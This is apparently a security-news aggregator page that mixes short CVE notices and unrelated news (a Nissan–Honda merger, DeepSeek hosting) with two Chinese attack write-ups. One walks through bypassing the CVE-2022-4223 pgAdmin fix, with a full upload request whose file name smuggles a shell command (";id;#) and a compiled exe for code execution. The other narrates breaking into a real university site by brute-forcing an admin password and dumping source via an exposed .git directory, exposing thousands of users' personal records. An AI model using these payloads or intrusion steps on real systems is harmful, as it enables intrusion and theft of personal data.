Aggregator

A vulnerability classified as problematic was found in Widget4Call Plugin up to 1.0.7 on WordPress. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. This vulnerability is known as CVE-2024-13099. The attack can be launched remotely. There is no exploit available.

A vulnerability has been found in wordplus Better Messages Plugin up to 2.6.9 on WordPress and classified as problematic. This vulnerability affects the function better_messages_live_chat_button of the component Shortcode Handler. The manipulation leads to cross site scripting. This vulnerability was named CVE-2024-13612. The attack can be initiated remotely. There is no exploit available.

我们可以看到针对于漏洞 CVE-2022-4223，官方做了一定的修复措施。

web\pgadmin\misc__init__.py#validate_binary_path

首先是添加了 @login_required 进行权限校验。在 Flask 框架中，@login_required 装饰器通常与 Flask-Login 扩展一起使用。Flask-Login 提供了简单而强大的用户身份验证功能，其中包括 @login_required 装饰器用于保护需要登录用户才能访问的视图。当在一个函数、方法或类上应用 @login_required 装饰器时，它会检查当前用户是否已经登录。如果用户未登录，则会将其重定向到登录页面或返回相应的错误信息，而不允许访问被装饰的代码块。

添加了权限校验之后，这个漏洞就从未授权的前台漏洞，转换为需要登录的后台漏洞了。

同时对传入的路径进行校验，通过 os.path.exists 来判断是否存在。

linux

我们发现会对传入的路径进行校验的，那么在linux 下，我们可以通过在服务器上上传一个包含恶意文件名的文件，来进行绕过。

可以从 docker hub 上搜索 docker 资源

https://hub.docker.com/search?q=pgadmin

docker pull dpage/pgadmin4:7.6
docker run -e '[email protected]' -e 'PGADMIN_DEFAULT_PASSWORD=123456'  -p 5050:80 --name pgadmin -d  docker.io/dpage/pgadmin4:7.6

登录后台工具->存储管理器

上传一个包含恶意文件名的文件

POST /file_manager/filemanager/3395111/ HTTP/1.1
Host: 127.0.0.1:5050
Content-Length: 491
X-pgA-CSRFToken: ImE3NDYzOGJhOWYxNDIzY2QzZDUwNTI3MWMzOGU4NGNhMmNhNzkzYTQi.Zi8ctA._DuZsbw2SE05kwuVkqgG7Y-KsjE
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryihDQGI2B09k9alLf
Origin: http://127.0.0.1:5050
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:5050/browser/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: pga4_session=2397843f-fbe6-4481-947e-e30f73c6a0ee!GPxXiZuTJzjVn+sk6vhlLNAmjhQr6xIY0yumFSIGBAQ=; PGADMIN_LANGUAGE=zh
Connection: close

------WebKitFormBoundaryihDQGI2B09k9alLf
Content-Disposition: form-data; name="newfile"; filename="\";id;#"
Content-Type: text/plain

123
------WebKitFormBoundaryihDQGI2B09k9alLf
Content-Disposition: form-data; name="mode"

add
------WebKitFormBoundaryihDQGI2B09k9alLf
Content-Disposition: form-data; name="currentpath"

/
------WebKitFormBoundaryihDQGI2B09k9alLf
Content-Disposition: form-data; name="storage_folder"

my_storage
------WebKitFormBoundaryihDQGI2B09k9alLf--

同时可以得到在文件在服务器上的路径

打开文件->配置

路径->二进制路径->填入恶意文件的位置

点击运行

windows

下载软件并进行安装

https://ftp.postgresql.org/pub/pgadmin/pgadmin4/v6.21/windows/pgadmin4-6.21-x64.exe

需要把C:\Users\username\AppData\Local\Programs\pgAdmin 4\v5\web 下的config.py 修改 DEFAULT_SERVER \= '0.0.0.0'

因为windows 无法利用拼接来执行命令，所以还是要想办法成功加载文件才行。

import os
binary_path = "\\\\192.168.222.128\\TMP\\"
UTILITIES_ARRAY = ['pg_dump', 'pg_dumpall', 'pg_restore', 'psql']
for utility in UTILITIES_ARRAY:
   full_path = os.path.abspath(
       os.path.join(binary_path, (utility if os.name != 'nt' else (utility + '.exe')))
   )
   print(full_path)
   print(os.path.exists(full_path))

windows 不能再利用共享资源来实现，所以也构造一个exe 上传并执行。

编译恶意的exe文件并放到上传

• pip install pyinstaller

• type execute_calc.py

  import subprocess
  
  def execute_calc():
     subprocess.call("calc.exe")
  
  if __name__ == "__main__":
     execute_calc()

• pyinstaller --onefile execute_calc.py

和linux启动有所不同

Tools->import

成功将恶意文件上传到服务器上。

同时构造请求数据包

POST /misc/validate_binary_path HTTP/1.1
Host: 192.168.222.145:5050
X-pgA-CSRFToken: IjU4MzQ0OTM2Yzc3YzM5ZmE5Yjg0MjRhODVlNzkzZjM5MTViZDBmNzki.Zi9GcQ.pGwCjLqPq3fNzohIRNerpipIRK8
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Origin: http://192.168.222.145:5050
Referer: http://192.168.222.145:5050/browser/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: pga4_session=e6f521fc-e9f4-4c58-bf0a-e9abafb4ceb5!JG7fBzRT4FkugKb175t9vWdZpKmAtnbo0d/oPzcAbFI=; PGADMIN_LANGUAGE=en
Connection: close
Content-Type: application/json
Content-Length: 39

{"utility_path":"C:\\Users\\whippet\\"}

可能是因为本地测试的原因，后来尝试的时候发现，本地去调用共享文件时，可以接收到请求，但是很快就断开连接，所以最后的结果是 False。

所以环境为windwos 时可以利用共享资源来绕过 os.path.exists(）的检测。

  

文章讨论了针对CVE-2022-4223漏洞的修复措施，包括添加权限校验和路径验证。然而，在Linux和Windows环境下，攻击者仍可通过上传恶意文件名或构造共享资源绕过检测，最终实现代码执行或权限提升。

Cisco has released updates to address two critical security flaws Identity Services Engine (ISE) that could allow remote attackers to execute arbitrary commands and elevate privileges on susceptible devices. The vulnerabilities are listed below - CVE-2025-20124 (CVSS score: 9.9) - An insecure Java deserialization vulnerability in an API of Cisco ISE that could permit an authenticated, remote

文章作者希望通过学习黑客技术来保护家人和朋友的安全。他已经具备基本的计算机知识，并自行组装了电脑。他表示愿意系统地学习相关技能，并承诺保守所学的秘密。

A recently discovered zero-day vulnerability in the Mobile Security Framework (MobSF) has raised alarms in the cybersecurity community. The vulnerability, which allows attackers to cause a partial Denial of Service (DoS) on scan results and the iOS Dynamic Analyzer functionality, was disclosed on GitHub yesterday by Ajin Abraham, under the advisory GHSA-jrm8-xgf3-fwqr. Technical Overview The vulnerability, […]

The post MobSF Framework Zero-Day Vulnerability Allows Attackers to Trigger DoS in Scan Results appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

本文结合其它用户案例分析讲解挖掘某双一流站点的过程，包含日志泄露漏洞深入利用失败，到不弱的弱口令字典进入后台，再到最后偶遇一个貌似只在靶场遇到过的高危漏洞。

信息搜集：

web站点的话从域名，ip等入手范围太大了，于是决定直接从小程序入手。

微信搜索学校名称，便直接可以通过公众号，小程序寻找目标。这里注意如果你要挖掘某edu的漏洞，就可以多关注他们的公众号，小程序，看看最近有没有什么新的功能出现，这种功能点漏洞比较容易出现。

于是我直接在某公众号发现了一个新功能：报名入口。临近毕业，所有有很多公司可能会来学校宣讲或者招人，这种时候就很有可能出现新功能，本案例就是。

照常点击功能，出现跳转，直接转浏览器测web页面。

日志泄露nday：

在登陆时发现限定了登陆时间，而目前已经不在时间内，可见这其实就是一个临时的系统。

我检查js信息尝试调试js绕过，没成功就通过报错发现为thinkphp框架，直接上工具一把梭。

链接：https://github.com/Lotus6/ThinkphpGUI

只可惜只存在一个日志泄露的nday,没能shell。

根据日志泄露目录可以发现能够遍历近一年的日志信息，此时的思路就是从日志中看能不能拿到管理员或者其它用户登陆的敏感信息，例如账号密码之类，这样就可以扩大日志泄露危害，进一步挖掘利用。

参考文章：

https://cloud.tencent.com/developer/article/1752185

这篇文章就是利用kali自带工具whatweb探测出thinkphp框架：

并通过dirb扫除.svn泄露：

再通过svnExploit工具进行下载利用：

链接：https://github.com/admintony/svnExploit

并在svn中发现大量日志泄露：

并通过找到最新的日志信息，找到密码hash值，通过cmd5实现解密并成功进入后台：

https://blog.csdn.net/qq_41781465/article/details/144092247

这篇文章也是在日志信息中成功找到账号密码，配合dirsearch扫出后台，成功登陆：

不过我这次日志信息量虽然很大，且经过我实际尝试也确实会记录我的一些操作信息，但翻遍日志却并貌似不存在敏感信息：

但我发现在日志中泄露了sql语句，貌似可以寻找对应接口，参数拼接成数据包尝试sql注入，但我找遍了日志都没有发现可以直接使用的接口或者代入了sql语句的参数。

不弱的弱口令：

翻找js文件，尝试直接拼接登陆验证接口，和其它查询接口全部失败。

不过根据找到的其它js路径发现其目录结构基本拼接在/syl/下，于是根据经验在目录后拼接admin,系统跳转到后台管理员登陆界面，输入账户为admin页面显示密码错误，输入其它账户页面显示账号不存在，可知账户为admin。

根据页面特征制作字典并加上弱口令top500的内容，尝试爆破成功：密码为页面根路径字母syl+88888888。

这种:syl88888888一看就是弱口令，但如果你只是通过现存的什么top100，top500这种字典是爆破不出来的，所以在进行渗透测试时一定还要根据页面特征，关键字，系统名称首字母等信息制作特定的社工字典尝试。

比如kali自带的cewl工具，便是一种基于爬虫，对页面目录信息进行循环爬取再生成字典的工具。

工具分析文章：https://www.cnblogs.com/jackie-lee/p/16132116.html

成功进入后台。

并发现大量信息泄露：

存在四千多条用户敏感信息泄露。

爬出靶场的高危：

通过dirsearch扫描目录，看有没有结果。

直接扫出来了好几条.git路径，直接访问泄露的路径看不出什么敏感信息。

但很明显站点存在.git信息泄露漏洞，一个我曾经只在ctf技能树复现过的漏洞。

Git就是一个开源的分布式版本控制系统，在执行gitinit初始化目录时会在当前目录下自动创建一个.git目录，用来记录代码的变更记录等，发布代码的时候如果没有把.git这个目录删除而是直接发布到服务器上，那么攻击者就可以通过它来恢复源代码，从而造成信息泄露等一系列的安全问题。

尝试githack进行探测利用（只能python2使用）

工具链接：https://github.com/BugScanTeam/GitHack

该工具基本原理就是解析.git/index文件，找到工程中所有的文件，文件名，再去.git/objects/文件夹下下载对应的文件，并通过zlib解压文件并按原始的目录结构写入源代码

结果我直接把整个git扒了下来，得到站点整套源码，于是通过vscode打开分析：

随意翻找文件，找到mysql数据库账号密码，于是扫描端口发现开启3306，尝试连接，发现似乎做了IP白名单限制，于是放弃。

再翻找文件，发现居然直接把后台部分用户的信息写在了.sql文件内，包含姓名，身份证，电话等信息，不过只有几百条。

此处其实还可以深入对php源码进行审计，发现更多高危漏洞，但我却不会php代审，所以打到这里就收工了，觉得应该可以拿证了。

整个渗透过程很顺利，大概就两三个小时，还是信息搜集做得好，不然都不一定能出成果，同时需要多阅读漏洞挖掘文章，这样在渗透测试过程中才能对漏洞利用更加熟练。

  

本文描述了一次针对某双一流站点的漏洞挖掘过程。作者通过微信小程序发现目标网站的新功能入口，并尝试利用日志泄露和弱口令爆破进入后台。最终通过.git目录泄露获取源码，并发现了大量用户敏感信息和高危漏洞。整个过程展示了信息搜集和漏洞利用的重要性。

日产汽车社长内田诚 6 日上午造访东京的本田总部，与本田社长三部敏宏举行会谈。日产基本决定中止经营合并磋商、撤回协议，并将这一意向告知了本田。日产拟拒绝本田提出的将日产纳为子公司的方案。本田和日产去年 12 月宣布就经营合并正式开启磋商，最初提出的计划是设立控股公司将两家公司纳入旗下。但本田担忧业绩恶化的日产提出的合理化措施实效性，之后提出了新方案欲将日产纳为子公司从而掌握经营主导权。本田此前将日产落实去年 11 月提出的以全球裁员 9000 人和产能缩小两成为核心的合理化措施作为合并条件，但日产迟迟未能具体推进而导致本田不满。按照最初的计划，双方在今年 6 月签署合并协议，2026 年 8 月设立控股公司。

A vulnerability classified as problematic was found in Backdrop CMS up to 1.28.4/1.29.2. Affected by this vulnerability is an unknown functionality of the component CKEditor 5 Rich Text Editor. The manipulation leads to cross site scripting. This vulnerability is known as CVE-2025-25062. The attack can be launched remotely. There is no exploit available. It is recommended to upgrade the affected component.

A vulnerability, which was classified as problematic, was found in Backdrop CMS up to 1.28.4/1.29.2. Affected is an unknown function of the component SVG Image Handler. The manipulation leads to cross site scripting. This vulnerability is traded as CVE-2025-25063. It is possible to launch the attack remotely. There is no exploit available. It is recommended to upgrade the affected component.

加拿大网络安全公司 Feroot Security 对 Web 版 DeepSeek 代码的分析显示，该公司使用了中移动的基础设施。中移动是最大的移动通讯服务商，同时也是最大的网络服务商之一，DeepSeek 使用中移动的基础设施并不出人意料。问题在于中移动受到了美国的有限制裁，美国人被限制投资中移动。这项分析没有涉及移动版的 APP，DeepSeek 的 AI 助手是苹果和 Google 应用商店下载量最高的 APP 之一。

A vulnerability was found in Humming Heads Defense Platform Home Edition up to 3.9.51.x and classified as critical. Affected by this issue is some unknown functionality. The manipulation leads to execution with unnecessary privileges. This vulnerability is handled as CVE-2025-22890. An attack has to be approached locally. There is no exploit available.

A vulnerability has been found in villatheme CURCY Plugin up to 2.2.5 on WordPress and classified as problematic. Affected by this vulnerability is the function get_products_price of the component Shortcode Handler. The manipulation leads to code injection. This vulnerability is known as CVE-2024-13487. The attack can be launched remotely. There is no exploit available.

Cybersecurity enthusiasts and IT administrators worldwide are voicing concerns over a newly discovered vulnerability in AnyDesk that could lead to local privilege escalation (LPE). The vulnerability, identified as CVE-2024-12754 and coordinated by Trend Micro’s Zero Day Initiative, allows attackers to weaponize Windows background images for escalating permissions on Windows systems. A Closer Look at the Vulnerability Discovered […]

The post AnyDesk Flaw Allows Admin Access Through Weaponized Windows Wallpapers appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

A vulnerability, which was classified as problematic, was found in Webkul QloApps 1.6.1. Affected is the function logout of the file /en/?mylogout of the component URL Handler. The manipulation leads to cross-site request forgery. This vulnerability is traded as CVE-2025-1074. It is possible to launch the attack remotely. Furthermore, there is an exploit available. The vendor was contacted early about this disclosure. They are aware about it and are working on resolving it. The vendor was contacted early about this disclosure. They are aware about it and are working on resolving it.

A vulnerability classified as critical has been found in IBM HomePagePrint 1.0.7 on Win 98. Affected is an unknown function of the component HTML Tag Handler. The manipulation of the argument IMG SRC leads to memory corruption. This vulnerability is traded as CVE-1999-1531. It is possible to launch the attack remotely. Furthermore, there is an exploit available.

A vulnerability was found in Essential WP Real Estate Plugin up to 1.1.3 on WordPress. It has been declared as problematic. This vulnerability affects unknown code of the component URL Handler. The manipulation leads to cross site scripting. This vulnerability was named CVE-2024-13347. The attack can be initiated remotely. There is no exploit available.

A vulnerability classified as problematic was found in Hakan Ozevin BASE Booking Plugin up to 5.0.0 on WordPress. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. This vulnerability is known as CVE-2025-22684. The attack can be launched remotely. There is no exploit available. It is recommended to upgrade the affected component.